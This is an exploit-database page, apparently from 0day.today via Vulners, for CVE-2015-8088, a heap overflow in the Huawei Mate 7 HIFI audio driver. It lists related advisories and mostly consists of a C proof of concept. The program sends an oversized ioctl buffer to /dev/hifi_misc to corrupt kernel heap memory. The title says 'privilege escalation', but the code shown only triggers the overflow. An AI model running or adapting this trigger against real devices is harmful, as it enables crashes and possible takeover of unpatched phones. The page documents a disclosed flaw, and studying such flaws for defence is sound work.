Huawei Mate 7 - (/dev/hifi_misc) Privilege Escalation Exploit

🗓️ 20 Mar 2018 00:00:00Reported by pray3rType

zdt🔗 0day.today👁 29 Views

Huawei Mate 7 /dev/hifi_misc Privilege Escalation Exploi

Reporter	Title	Published	Views	Family All 8
Gitee	Exploit for Out-of-bounds Write in Linux Linux_Kernel	13 Sep 202521:03	–	gitee
CNVD	Huawei Mate7 HIFI Driver Memory Heap Overflow Vulnerability	10 Nov 201500:00	–	cnvd
CVE	CVE-2015-8088	12 Jan 201619:00	–	cve
Cvelist	CVE-2015-8088	12 Jan 201619:00	–	cvelist
EUVD	EUVD-2015-7981	7 Oct 202500:30	–	euvd
Huawei	Security Advisory - Heap Overflow Vulnerability in the HIFI Driver of Huawei Smart Phone	4 Nov 201500:00	–	huawei
NVD	CVE-2015-8088	12 Jan 201619:59	–	nvd
Prion	Heap overflow	12 Jan 201619:59	–	prion

/*
 *
 *  HuaWei Mate7 hifi driver Poc
 *
 *  Writen by pray3r, <[email protected]>
 *
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
 
#define HIFI_MISC_IOCTL_WRITE_PARAMS    _IOWR('A', 0x75, struct misc_io_sync_param)
 
struct misc_io_sync_param {
    void *                  para_in;           
    unsigned int            para_size_in;       
    void *                  para_out;           
    unsigned int            para_size_out;   
};
 
int main(int arg, char **argv)
{
    int fd; 
    void *in = malloc(300 * 1024);
    void *out = malloc(100);
    struct misc_io_sync_param poc;
 
    poc.para_in = in;
    poc.para_size_in = 300 * 1024;
    poc.para_out = out;
    poc.para_size_out = 100;
 
    fd = open("/dev/hifi_misc", O_RDWR);
 
    ioctl(fd, HIFI_MISC_IOCTL_WRITE_PARAMS, &poc);
 
    free(in);
    free(out);
 
    return 0;
}

#  0day.today [2018-04-06]  #

20 Mar 2018 00:00Current

7.4High risk

Vulners AI Score7.4

EPSS0.00801